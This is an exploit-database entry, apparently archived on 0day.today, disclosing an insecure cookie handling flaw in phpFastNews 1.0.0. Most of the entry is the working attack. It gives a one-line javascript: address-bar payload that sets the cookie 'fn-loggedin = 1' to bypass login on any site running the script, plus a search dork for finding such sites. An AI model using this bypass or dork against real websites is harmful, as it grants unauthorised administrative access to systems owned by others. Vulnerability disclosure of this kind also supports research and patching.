id: 3912
date: 10/17/2008
title: phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability
author: Qabandi
cves: 

========================================================
phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability
========================================================


#################################################
##		from Kuwait		       ##
#################################################
\\	phpFastNews
//	 Insecure cookie handling
\\
//   Go to any website that has the script installed
\\	type the following code into the Adress Bar
//
\\	javascript:document.cookie = "fn-loggedin = 1";
//
\\	Refresh do whatever, and you will be logged in
//
\\		Dork:intext:"Powered by phpFastNews"
#################################################





#  0day.today [2023-03-25]  #